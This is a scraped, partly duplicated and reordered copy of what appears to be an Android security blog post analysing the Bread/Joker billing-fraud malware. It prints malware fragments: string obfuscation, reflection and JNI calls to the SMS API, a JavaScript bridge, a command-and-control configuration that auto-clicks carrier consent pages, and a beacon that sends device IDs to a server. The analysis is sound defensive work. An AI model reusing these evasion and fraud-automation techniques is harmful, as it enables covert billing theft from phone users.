<br /> <pre class="prettyprint">&lt;a onclick="Sub()"&gt;ไปเด&#3637;&#3659;ยวน&#3637;&#3657;&lt;/a&gt; &lt;div style="display:none"&gt; &lt;p id="deviceid"&gt;deadbeefdeadbeefdeadbeefdeadbeef&lt;/p&gt; &lt;p id="cmobi"&gt;&lt;/p&gt; &lt;p id="deni"&gt;&lt;/p&gt; &lt;p id="ssm"&gt;&lt;/p&gt; &lt;p id="shortcode"&gt;&lt;/p&gt; &lt;p id="keyword"&gt;&lt;/p&gt; &lt;/div&gt; </pre> <h1> MISLEADING USERS</h1> Bread apps sometimes display a pop-up to the user that implies some form of compliance or disclosure, showing <strong>terms and conditions</strong> or a <strong>confirm</strong> button. However, the actual text would often only display a basic welcome message. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGq7h5f05pBnhkJHUork21ShlzEBprudwJepX2HdimmD2nU0mnBLsPEiVZTHcfqAegRvnyd_ulXeiJVEpL6elrL6DQR4J_X4B6x0xvn6sGWql8IA0Vam1gMGj3rRyh9l7RCIE1w6g2QW14/s1600/pastedimage0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="480" data-original-width="288" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGq7h5f05pBnhkJHUork21ShlzEBprudwJepX2HdimmD2nU0mnBLsPEiVZTHcfqAegRvnyd_ulXeiJVEpL6elrL6DQR4J_X4B6x0xvn6sGWql8IA0Vam1gMGj3rRyh9l7RCIE1w6g2QW14/s400/pastedimage0.png" width="240" /></a></div> <em>Translation: &#8220;This app is a place to be and it will feel like a superhero with this new app. We hope you enjoy it!&#8221;</em> <br /> Other versions included all the pieces needed for a valid disclosure message. 
<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizocTMrtfJG1zz64BT3VRWq5SNualxjEc0UhcXYoQHv1_VBG6zWk5z2lVWJey78rO5Jc8CeHVaO7YiwdAl4IjIdp4X7rWO08jV553NsTkjBIdoaBX0YWvjWDVN0NgpTIBzZnYgeeEziYD6/s1600/pastedImage0%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="480" data-original-width="288" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizocTMrtfJG1zz64BT3VRWq5SNualxjEc0UhcXYoQHv1_VBG6zWk5z2lVWJey78rO5Jc8CeHVaO7YiwdAl4IjIdp4X7rWO08jV553NsTkjBIdoaBX0YWvjWDVN0NgpTIBzZnYgeeEziYD6/s400/pastedImage0%25281%2529.png" width="240" /></a></div> When translated the disclosure reads: <br /> <em>&#8220;Apply Car Racing Clip \n Please enter your phone number for service details. \n Terms and Conditions \nFrom 9 Baht / day, you will receive 1 message / day. \nPlease stop the V4 printing service at 4739504 \n or call 02-697-9298 \n Monday - Friday at 8.30 - 5.30pm \n&#8221;</em> <br /> However, there are still two issues here: <br /> <ol> <li>The numbers to contact for cancelling the subscription are not real </li> <li>The billing process commences even if you don&#8217;t hit the &#8220;Confirm&#8221; button </li> </ol> Even if the disclosure here displayed accurate information, the user would often find that the advertised functionality of the app did not match the actual content. Bread apps frequently contain no functionality beyond the billing process or simply clone content from other popular apps. <br /> <h1> VERSIONING</h1> Bread has also leveraged an abuse tactic unique to app stores: versioning. Some apps have started with clean versions, in an attempt to grow user bases and build the developer accounts&#8217; reputations. Only later is the malicious code introduced, through an update. 
Interestingly, early &#8220;clean&#8221; versions contain varying levels of signals that the updates will include malicious code later. Some are first uploaded with all the necessary code except the one line that actually initializes the billing process. Others may have the necessary permissions, but are missing the classes containing the fraud code. And others have all malicious content removed, except for log comments referencing the payment process. All of these methods attempt to space out the introduction of possible signals across several updates, probing for gaps in the publication process. However, Google Play Protect (GPP) does not treat new apps and updates any differently from an analysis perspective: an update is analyzed as thoroughly as a fresh submission. <br /> <h1> FAKE REVIEWS</h1> When early versions of apps are first published, many five star reviews appear with comments like: <br /> <span id="docs-internal-guid-8eedb8d6-7fff-bd38-9c86-11bc00e9594f"><span style="color: #434343; font-family: &quot;roboto&quot; , sans-serif; font-size: 14pt; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 35px; overflow: hidden; width: 130px;"><img height="35" src="https://lh5.googleusercontent.com/FKSIFYZvO3Nno5Zt9ixuDfMsoQ4cCQ-b2o0EqMwU6ffz5e0Q4cmwU8b5W3zaBs-toygv_6q1cDzB4ld1y_zH2zH0MAs5iaddUzuHjSMOwps0mJSVn3WYmRrmOgN4Yavvww-2-eGc" style="margin-left: 0px; margin-top: 0px;" width="130" /></span></span></span><span style="color: #434343; font-family: &quot;roboto&quot; , sans-serif; font-size: 14pt; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 35px; overflow: hidden; width: 130px;"><br /></span></span> </span> <br /> <em>&#8220;So..good..&#8221;</em> <br /> <em>&#8220;very beautiful&#8221;</em> <br /> Later, 1 star reviews from <em>real</em> users start appearing with comments like: <br /> <em>&#8220;Deception&#8221;</em> <br /> <em>&#8220;The app is not honest &#8230;&#8221;</em> <br /> <h1> SUMMARY</h1> Sheer volume appears 
to be the preferred approach for Bread developers. At different times, we have seen three or more active variants using different approaches or targeting different carriers. Within each variant, the malicious code present in each sample may look nearly identical with only one evasion technique changed. Sample 1 may use AES-encrypted strings with reflection, while Sample 2 (submitted on the same day) will use the same code but with plaintext strings. <br /> At peak times of activity, we have seen up to 23 different apps from this family submitted to Play in one day. At other times, Bread appears to abandon hope of making a variant successful and we see a gap of a week or longer before the next variant. This family showcases the amount of resources that malware authors now have to expend. Google Play Protect is constantly updating detection engines and warning users of malicious apps installed on their device. <br /> <h1> SELECTED SAMPLES</h1> <table> <tbody> <tr> <td><strong>Package Name</strong> </td> <td><strong>SHA-256 Digest</strong> </td> </tr> <tr> <td>com.rabbit.artcamera </td> <td>18c277c7953983f45f2fe6ab4c7d872b2794c256604e43500045cb2b2084103f </td> </tr> <tr> <td>org.horoscope.astrology.predict </td> <td>6f1a1dbeb5b28c80ddc51b77a83c7a27b045309c4f1bff48aaff7d79dfd4eb26 </td> </tr> <tr> <td>com.theforest.rotatemarswallpaper </td> <td>4e78a26832a0d471922eb61231bc498463337fed8874db5f70b17dd06dcb9f09 </td> </tr> <tr> <td>com.jspany.temp </td> <td>0ce78efa764ce1e7fb92c4de351ec1113f3e2ca4b2932feef46d7d62d6ae87f5 </td> </tr> <tr> <td>com.hua.ru.quan </td> <td>780936deb27be5dceea20a5489014236796a74cc967a12e36cb56d9b8df9bc86 </td> </tr> <tr> <td>com.rongnea.udonood </td> <td>8b2271938c524dd1064e74717b82e48b778e49e26b5ac2dae8856555b5489131 </td> </tr> <tr> <td>com.mbv.a.wp </td> <td>01611e16f573da2c9dbc7acdd445d84bae71fecf2927753e341d8a5652b89a68 </td> </tr> <tr> <td>com.pho.nec.sg </td> <td>b4822eeb71c83e4aab5ddfecfb58459e5c5e10d382a2364da1c42621f58e119b </td> </tr> 
</tbody></table> <span itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <meta content='https://plus.google.com/116899029375914044550' itemprop='url'/> </span> </script> <noscript> <span class="byline-author">Posted by Alec Guertin and Vadim Kotov, Android Security &amp; Privacy Team </span><br /> <div class="separator" style="clear: both; text-align: center;"> <span class="byline-author"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzvCbCxf0H4zVtIrYFVhfDwTt-mVUt7UFChOTmjCXXN89nC9OXZ0l3pnWXQvL8_2cBlhup3ttww7blsCldGo88zTtxavBRXtcDoABD_qrBELwQEvIRthqYHNclB3q2Bqj-2yt8lBV_-Ebo/s1600/phaFamilyHighlights_Bread.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="763" data-original-width="1353" height="361" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzvCbCxf0H4zVtIrYFVhfDwTt-mVUt7UFChOTmjCXXN89nC9OXZ0l3pnWXQvL8_2cBlhup3ttww7blsCldGo88zTtxavBRXtcDoABD_qrBELwQEvIRthqYHNclB3q2Bqj-2yt8lBV_-Ebo/s640/phaFamilyHighlights_Bread.png" width="640" /></a></span></div> <span class="byline-author"> In this edition of our <strong>PHA Family Highlights</strong> series we introduce Bread, a large-scale billing fraud family. We first started tracking Bread (also known as Joker) in early 2017, identifying apps designed solely for <a href="https://developers.google.com/android/play-protect/phacategories#billing-fraud">SMS fraud</a>. As the Play Store has introduced new policies and Google Play Protect has scaled defenses, Bread apps were forced to continually iterate to search for gaps. They have at some point used just about every cloaking and obfuscation technique under the sun in an attempt to go undetected. Many of these samples appear to be designed specifically to attempt to slip into the Play Store undetected and are not seen elsewhere. 
In this post, we show how Google Play Protect has defended against a well organized, persistent attacker and share examples of their techniques. <br /> </span><br /> <h1> <span class="byline-author"> TL;DR</span></h1> <span class="byline-author"> </span> <br /> <ul><span class="byline-author"> <li>Google Play Protect detected and removed 1.7k unique Bread apps from the Play Store before ever being downloaded by users </li> <li>Bread apps originally performed SMS fraud, but have largely abandoned this for WAP billing following the introduction of <a href="https://android-developers.googleblog.com/2019/01/reminder-smscall-log-policy-changes.html">new Play policies</a> restricting use of the SEND_SMS permission and increased coverage by Google Play Protect </li> <li>More information on stats and relative impact is available in the <a href="https://www.blog.google/products/android-enterprise/look-back-2018-android-security-privacy-year-review/">Android Security 2018 Year in Review report</a> </li> </span></ul> <span class="byline-author"> </span> <h1> <span class="byline-author"> BILLING FRAUD</span></h1> <span class="byline-author"> Bread apps typically fall into two categories: SMS fraud (older versions) and toll fraud (newer versions). Both of these types of fraud take advantage of mobile billing techniques involving the user&#8217;s carrier. <br /> <h2> SMS Billing</h2> Carriers may partner with vendors to allow users to pay for services by SMS. The user simply needs to text a prescribed keyword to a prescribed number (shortcode). A charge is then added to the user&#8217;s bill with their mobile service provider. 
<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu8SShSiS3Pas9jvZKVSXIYRAD0gdkerJ9c8TTte33dHo1x9uSRBbxsezgMnolYqjWnmgzxdFjMkYljQAaFTDT-ntIk5Gk-w7psc7n-vpKIU46XzDVoUwTjazUn50KDsyFmUaUKzCpNZ5F/s1600/billFraud.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="709" data-original-width="546" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu8SShSiS3Pas9jvZKVSXIYRAD0gdkerJ9c8TTte33dHo1x9uSRBbxsezgMnolYqjWnmgzxdFjMkYljQAaFTDT-ntIk5Gk-w7psc7n-vpKIU46XzDVoUwTjazUn50KDsyFmUaUKzCpNZ5F/s400/billFraud.png" width="308" /></a></div> <h2> Toll Billing</h2> Carriers may also provide payment endpoints over a web page. The user visits the URL to complete the payment and enters their phone number. Verification that the request is coming from the user&#8217;s device is completed using two possible methods: <br /> <ol> <li>The user connects to the site over mobile data, not WiFi (so the service provider directly handles the connection and can validate the phone number); or </li> <li>The user must retrieve a code sent to them via SMS and enter it into the web page (thereby proving access to the provided phone number). </li> </ol> <h2> Fraud</h2> Both of the billing methods detailed above provide device verification, but not user verification. The carrier can determine that the request originates from the user&#8217;s device, but does not require any interaction from the user that cannot be automated. Malware authors use injected clicks, custom HTML parsers and SMS receivers to automate the billing process without requiring any interaction from the user. <br /> <h1> STRING &amp; DATA OBFUSCATION</h1> Bread apps have used many innovative and classic techniques to hide strings from analysis engines. Here are some highlights. 
<br /> <h2> Standard Encryption</h2> Frequently, Bread apps take advantage of the standard Java crypto APIs in <code>javax.crypto</code>. We have discovered apps using AES, Blowfish, and DES as well as combinations of these to encrypt their strings. Because the key material must ship inside the APK for the app to decrypt them at runtime, such strings are recoverable by locating the decryption routine and replaying it (as in the reflection example below, where the decrypted values are annotated). <br /> <h2> Custom Encryption</h2> Other variants have used custom-implemented encryption algorithms. Some common techniques include: basic XOR encryption, nested XOR and custom key-derivation methods. Some variants have gone so far as to use a different key for the strings of each class. <br /> <h2> Split Strings</h2> Encrypted strings can be a signal that the code is trying to hide something. Bread has used a few tricks to keep strings in plaintext while preventing basic string matching. <br /> <pre class="prettyprint">String click_code = new StringBuilder().append(".cli").append("ck();"); </pre> Going one step further, these substrings are sometimes scattered throughout the code, retrieved from static variables and method calls. Various versions may also change the index of the split (e.g. &#8220;.clic&#8221; and &#8220;k();&#8221;). <br /> <h2> Delimiters</h2> Another technique to obfuscate unencrypted strings uses repeated delimiters. A short, constant string of characters is inserted at strategic points to break up keywords: <br /> <pre class="prettyprint">String js = "javm6voTascrm6voTipt:window.SDFGHWEGSG.catcm6voThPage(docm6voTument.getElemm6voTentsByTm6voTagName('html')[m6voT0].innerHTML);" </pre> At runtime, the delimiter is removed before using the string: <br /> <pre class="prettyprint">js = js.replaceAll("m6voT", ""); </pre> <h1> API OBFUSCATION</h1> SMS and toll fraud generally require a few basic behaviors (for example, disabling WiFi or accessing SMS), which are accessible by a handful of APIs. Given that there are a limited number of behaviors required to identify billing fraud, Bread apps have had to try a wide variety of techniques to mask usage of these APIs. 
<br /> <h2> Reflection</h2> Most methods for hiding API usage tend to use Java reflection in some way. In some samples, Bread has simply directly called the Reflect API on strings decrypted at runtime. <br /> <pre class="prettyprint">Class smsManagerClass = Class.forName(p.a().decrypt("wI7HmhUo0OYTnO2rFy3yxE2DFECD2I9reFnmPF3LuAc=")); // android.telephony.SmsManager smsManagerClass.getMethod(p.a().decrypt("0oXNjC4kzLwqnPK9BiL4qw=="), // sendTextMessage String.class, String.class, String.class, PendingIntent.class, PendingIntent.class).invoke(smsManagerClass.getMethod(p.a().decrypt("xoXXrB8n1b0LjYfIYUObrA==")).invoke(null), addr, null, message, null, null); // getDefault </pre> <h2> JNI</h2> Bread has also tested our ability to analyze native code. In one sample, no SMS-related code appears in the DEX file, but there is a native method registered. <br /> <pre class="prettyprint"> public static native void nativesend(String arg0, String arg1); </pre> Two strings are passed into the call, the shortcode and keyword used for SMS billing (getter methods renamed here for clarity). <br /> <pre class="prettyprint"> JniManager.nativesend(this.get_shortcode(), this.get_keyword()); </pre> In the native library, it stores the strings to access the SMS API. 
<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL1lmTDAsIjHhKj4KHVCOHomtgjur13HIpTF1piKz_vrCCG6Suqdn-Hiib750TnBR9OeINPMxPu-9Zd-sUsbGrAzxliR48p94slqnng6hlezwskfxxKuwV1GSUgoaj8vAuB8W8FhAKtlEg/s1600/stringsShadow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="224" data-original-width="1048" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL1lmTDAsIjHhKj4KHVCOHomtgjur13HIpTF1piKz_vrCCG6Suqdn-Hiib750TnBR9OeINPMxPu-9Zd-sUsbGrAzxliR48p94slqnng6hlezwskfxxKuwV1GSUgoaj8vAuB8W8FhAKtlEg/s1600/stringsShadow.png" /></a></div> The <code>nativesend</code> method uses the Java Native Interface (JNI) to fetch and call the Android SMS API. The following is a screenshot from IDA with comments showing the strings and JNI functions. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQHWcCNXsi_ymUvlfvFBPtimS7DS5Fh_AgcESPoEAKxfIg4QjPawHBOuFEpA98T0mPu_AOPSaBkhTNFweMlnSpVT3Xeu1U8eacj6MPaVlouE3NxZvpO92A0izXwoYkBl_JKTSf0o5L1GMH/s1600/nativesend2Shadow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="787" data-original-width="1378" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQHWcCNXsi_ymUvlfvFBPtimS7DS5Fh_AgcESPoEAKxfIg4QjPawHBOuFEpA98T0mPu_AOPSaBkhTNFweMlnSpVT3Xeu1U8eacj6MPaVlouE3NxZvpO92A0izXwoYkBl_JKTSf0o5L1GMH/s1600/nativesend2Shadow.png" /></a></div> <h2> WebView JavaScript Interface</h2> Continuing on the theme of cross-language bridges, Bread has also tried out some obfuscation methods utilizing JavaScript in WebViews. The following method is declared in the DEX. 
<br /> <pre class="prettyprint"> public void method1(String p7, String p8, String p9, String p10, String p11) { Class v0_1 = Class.forName(p7); Class[] v1_1 = new Class[0]; Object[] v3_1 = new Object[0]; Object v1_3 = v0_1.getMethod(p8, v1_1).invoke(0, v3_1); Class[] v2_2 = new Class[5]; v2_2[0] = String.class; v2_2[1] = String.class; v2_2[2] = String.class; v2_2[3] = android.app.PendingIntent.class; v2_2[4] = android.app.PendingIntent.class; reflect.Method v0_2 = v0_1.getMethod(p9, v2_2); Object[] v2_4 = new Object[5]; v2_4[0] = p10; v2_4[1] = 0; v2_4[2] = p11; v2_4[3] = 0; v2_4[4] = 0; v0_2.invoke(v1_3, v2_4); } </pre> Without context, this method does not reveal much about its intended behavior, and there are no calls made to it anywhere in the DEX. One static clue does survive: the parameter types it resolves for <code>p9</code> (three <code>String</code>s followed by two <code>PendingIntent</code>s) match the <code>sendTextMessage</code> signature seen in the reflection example above, even though the class and method names themselves are absent. The app does, though, create a WebView and register a JavaScript interface to this class. <br /> <pre class="prettyprint">this.webView.addJavascriptInterface(this, "stub"); </pre> This gives JavaScript run in the WebView access to this method (for apps targeting API 17 or later, only methods annotated with <code>@JavascriptInterface</code> are exposed this way, so that annotation is another indicator worth searching for). The app loads a URL pointing to a Bread-controlled server, so the class and method names needed to complete the call never appear in the APK. The response contains some basic HTML and JavaScript. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyDMRoRbv3jAGCBbaOD-oT9SvtbY7cBAtwFm61tnrqlXhqaS3qVjhzanbkIwArDUskWp7zevd_h-Y3dF-Mr8UM7mz-6Ube6ooK6y4_jNYT2xbT8cbaaxO9aO2QsZVL8sNx1bPr17SZS7x1/s1600/Screenshot+2020-01-09+at+11.48.44+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="552" data-original-width="1164" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyDMRoRbv3jAGCBbaOD-oT9SvtbY7cBAtwFm61tnrqlXhqaS3qVjhzanbkIwArDUskWp7zevd_h-Y3dF-Mr8UM7mz-6Ube6ooK6y4_jNYT2xbT8cbaaxO9aO2QsZVL8sNx1bPr17SZS7x1/s1600/Screenshot+2020-01-09+at+11.48.44+AM.png" /></a></div> In green, we can see the references to the SMS API. 
In red, we see those values being passed into the suspicious Java method through the registered interface. Now, using these strings <code>method1</code> can use reflection to call <code>sendTextMessage</code> and process the payment. <br /> <h1> PACKING</h1> In addition to implementing custom obfuscation techniques, apps have used several commercially available packers including: Qihoo360, AliProtect and SecShell. <br /> More recently, we have seen Bread-related apps trying to hide malicious code in a native library shipped with the APK. Earlier this year, we discovered apps hiding a JAR in the data section of an ELF file which it then dynamically loads using <code>DexClassLoader</code>. <br /> The figure below shows a fragment of encrypted JAR stored in .rodata section of a shared object shipped with the APK as well as the XOR key used for decryption. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3jdkV5dxRsrBwvzvRCe9N_4Nzwj2fJ7zjTdh9TXUa4SyUQQmUxRZw3Vk5pYT0Eg78z_Dpav5Hjs0FVEPiAp-XzkQk9fp34xPJi-OAZc7yBnTuWPFrjODYfZyvaSyPQTFt-RIzNKGkyh_2/s1600/ida-screenshotShadow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="544" data-original-width="736" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3jdkV5dxRsrBwvzvRCe9N_4Nzwj2fJ7zjTdh9TXUa4SyUQQmUxRZw3Vk5pYT0Eg78z_Dpav5Hjs0FVEPiAp-XzkQk9fp34xPJi-OAZc7yBnTuWPFrjODYfZyvaSyPQTFt-RIzNKGkyh_2/s1600/ida-screenshotShadow.png" /></a></div> After we blocked those samples, they moved a significant portion of malicious functionality into the native library, which resulted in a rather peculiar back and forth between Dalvik and native code: <br /> <div class="separator" style="clear: both; text-align: center;"> <a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQbFqDOpiG7WQbB9jp0kmzK6jloKbKMI4IszfYI7brxjMLuSblaKi3554RvBIhAxwuBhSBDcHwp2ee2nP946e9Mvf-GBLE1hxdibMqNvxrM5VV4NVCAsIL3at1xrksuUdiqRbiQWYaWiqw/s1600/sqwzJ9G8weGFxDnqqfmrT6Q.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="407" data-original-width="720" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQbFqDOpiG7WQbB9jp0kmzK6jloKbKMI4IszfYI7brxjMLuSblaKi3554RvBIhAxwuBhSBDcHwp2ee2nP946e9Mvf-GBLE1hxdibMqNvxrM5VV4NVCAsIL3at1xrksuUdiqRbiQWYaWiqw/s1600/sqwzJ9G8weGFxDnqqfmrT6Q.png" /></a></div> <h1> COMMAND &amp; CONTROL</h1> <h2> Dynamic Shortcodes &amp; Content</h2> Early versions of Bread utilized a basic command and control infrastructure to dynamically deliver content and retrieve billing details. In the example server response below, the green fields show text to be shown to the user. The red fields are used as the shortcode and keyword for SMS billing. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh07quSRgdd1DGBiU8MIUriPHfdIwSZOxyNqhtRM6TaJXSqsWnxAf3rMfSJD_sf6RR0c8cQ7DErJEgt4HBVvQe86v3Gvmd138PqDMTJdZmpONtirMEjUzsMsnmyZCdByahyphenhyphenSBD_wivxEeAf/s1600/Screenshot+2020-01-09+at+11.51.43+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="318" data-original-width="1160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh07quSRgdd1DGBiU8MIUriPHfdIwSZOxyNqhtRM6TaJXSqsWnxAf3rMfSJD_sf6RR0c8cQ7DErJEgt4HBVvQe86v3Gvmd138PqDMTJdZmpONtirMEjUzsMsnmyZCdByahyphenhyphenSBD_wivxEeAf/s1600/Screenshot+2020-01-09+at+11.51.43+AM.png" /></a></div> <h2> State Machines</h2> Since various carriers implement the billing process differently, Bread has developed several variants containing generalized state machines implementing all possible steps. 
At runtime, the apps can check which carrier the device is connected to and fetch a configuration object from the command and control server. The configuration contains an ordered list of steps to execute, each carrying a URL to load and/or JavaScript to run; in the example below the injected <code>jsFun</code> simply clicks a link on the carrier&#8217;s consent page on the user&#8217;s behalf. <br /> <pre class="prettyprint">{ "message":"Success", "result":[ { "list":[ { "endUrl":"http://sabai5555.com/", "netType":0, "number":1, "offerId":"1009", "step":1, "trankUrl": "http://atracking-auto.appflood.com/transaction/post_click?offer_id=19190660&amp;aff_id=10336" }, { "netType":0, "number":2, "offerId":"1009", "params":"function jsFun(){document.getElementsByTagName('a')[1].click()};", "step":2 }, { "endUrl":"http://consentprt.dtac.co.th/webaoc/InformationPage", "netType":0, "number":3, "offerId":"1009", "params":"javascript:jsFun()", "step":4 }, { "endUrl":"http://consentprt.dtac.co.th/webaoc/SuccessPage", "netType":0, "number":4, "offerId":"1009", "params":"javascript:getOk()", "step":3 }, { "netType":0, "number":5, "offerId":"1009", "step":7 } ], "netType":0, "offerId":"1009" } ], "code":"200" } </pre> The steps implemented include: <br /> <ul> <li>Load a URL in a WebView </li> <li>Run JavaScript in WebView </li> <li>Toggle WiFi state </li> <li>Toggle mobile data state (together with the WiFi toggle, this forces the billing page to be fetched over the carrier&#8217;s own network so the subscriber can be identified, as described under Toll Billing) </li> <li>Read/modify SMS inbox (to capture a verification code the carrier sends by SMS) </li> <li>Solve captchas </li> </ul> <h3> Captchas</h3> One of the more interesting states implements the ability to solve basic captchas (obscured letters and numbers). First, the app creates a JavaScript function to call a Java method, <code>getImageBase64</code>, exposed to WebView using <code>addJavascriptInterface</code>. 
<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2r-HhAcy8LKR2nyEHC1zMpOaIbzg8c1zewkIKYBxmesTABQ0waihbLTyslgmpO4nxw1m90ASeNXz5vj5qqYoh7EzvlfKBez-k9kpmg2QQT9w_GkJzc4G19SuZJnGqgXICcag69vzTZqEU/s1600/Screenshot+2020-01-09+at+11.52.50+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="306" data-original-width="1142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2r-HhAcy8LKR2nyEHC1zMpOaIbzg8c1zewkIKYBxmesTABQ0waihbLTyslgmpO4nxw1m90ASeNXz5vj5qqYoh7EzvlfKBez-k9kpmg2QQT9w_GkJzc4G19SuZJnGqgXICcag69vzTZqEU/s1600/Screenshot+2020-01-09+at+11.52.50+AM.png" /></a></div> The value used to replace <code>GET_IMG_OBJECT</code> comes from the JSON configuration. <br /> <pre class="prettyprint">"params": "document.getElementById('captcha')" </pre> The app then uses JavaScript injection to create a new script in the carrier&#8217;s web page to run the new function. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaNOFVio3o24-WzCn6_D-xPnpZIK33qjG5eW73ryDi3vClospKza2_Rir9Uuclh1WmXrvVEoxkDmxY3fGCsZYaeFZuccon7lWjsZI7hNAbEA5F-u2XjFofVs9lfl5l3LRNZjsSHEmUCosg/s1600/Screenshot+2020-01-09+at+11.53.51+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="245" data-original-width="1158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaNOFVio3o24-WzCn6_D-xPnpZIK33qjG5eW73ryDi3vClospKza2_Rir9Uuclh1WmXrvVEoxkDmxY3fGCsZYaeFZuccon7lWjsZI7hNAbEA5F-u2XjFofVs9lfl5l3LRNZjsSHEmUCosg/s1600/Screenshot+2020-01-09+at+11.53.51+AM.png" /></a></div> The base64-encoded image is then uploaded to an image recognition service. If the text is retrieved successfully, the app uses JavaScript injection again to submit the HTML form with the captcha answer. 
<br /> <h1> CLOAKING</h1> <h2> Client-side Carrier Checks</h2> In our basic command &amp; control example above, we didn&#8217;t address the (incorrectly labeled) &#8220;imei&#8221; field. <br /> <pre class="prettyprint">{ "button": "ย&#3636;นด&#3637;ต&#3657;อนร&#3633;บ", "code": 0, "content": "F10", "imei": "52003,52005,52000", "rule": "Here are all the pictures you need, about happiness, beauty, beauty, etc., with our most sincere service, to provide you with the most complete resources.", "service": "4219245" } </pre> Despite its name, this field holds a list of concatenated Mobile Country Code (MCC) and Mobile Network Code (MNC) values (e.g. 52000 is MCC 520 followed by MNC 00) that the billing process will work for. In this example, the server response contains several values for Thai carriers. The app checks if the device&#8217;s network matches one of those provided by the server. If it does, it will commence with the billing process. If the value does not match, the app skips the &#8220;disclosure&#8221; page and billing process and brings the user straight to the app content. This doubles as cloaking: an analyst device or emulator that is not on one of the targeted carriers never exercises the billing code path, so dynamic analysis observes only the benign content. <br /> In some versions, the server would only return valid responses several days after the apps were submitted, presumably to outlast the initial review window. <br /> <h2> Server-side Carrier Checks</h2> In the JavaScript bridge API obfuscation example covered above, the server supplied the app with the necessary strings to complete the billing process. However, analysts may not always see the indicators of compromise in the server&#8217;s response. <br /> In this example, the requests to the server take the following form: <br /> <pre class="prettyprint">http://X.X.X.X/web?operator=52000&amp;id=com.battery.fakepackage&amp;deviceid=deadbeefdeadbeefdeadbeefdeadbeef </pre> Here, the &#8220;operator&#8221; query parameter is the concatenated Mobile Country Code and Mobile Network Code of the device&#8217;s current network (52000 in this case, one of the Thai values seen above). The server can use this information to determine if the user&#8217;s carrier is one of Bread&#8217;s targets. If not, the response is scrubbed of the strings used to complete the billing fraud, as in the response below, where the hidden <code>shortcode</code> and <code>keyword</code> elements are present but empty. Note that this beacon travels over plain HTTP, so the operator, package name and device identifier are observable on the wire. 
<br /> <pre class="prettyprint">&lt;a onclick="Sub()"&gt;ไปเด&#3637;&#3659;ยวน&#3637;&#3657;&lt;/a&gt; &lt;div style="display:none"&gt; &lt;p id="deviceid"&gt;deadbeefdeadbeefdeadbeefdeadbeef&lt;/p&gt; &lt;p id="cmobi"&gt;&lt;/p&gt; &lt;p id="deni"&gt;&lt;/p&gt; &lt;p id="ssm"&gt;&lt;/p&gt; &lt;p id="shortcode"&gt;&lt;/p&gt; &lt;p id="keyword"&gt;&lt;/p&gt; &lt;/div&gt; </pre> <h1> MISLEADING USERS</h1> Bread apps sometimes display a pop-up to the user that implies some form of compliance or disclosure, showing <strong>terms and conditions</strong> or a <strong>confirm</strong> button. However, the actual text would often only display a basic welcome message. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGq7h5f05pBnhkJHUork21ShlzEBprudwJepX2HdimmD2nU0mnBLsPEiVZTHcfqAegRvnyd_ulXeiJVEpL6elrL6DQR4J_X4B6x0xvn6sGWql8IA0Vam1gMGj3rRyh9l7RCIE1w6g2QW14/s1600/pastedimage0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="480" data-original-width="288" height="400" 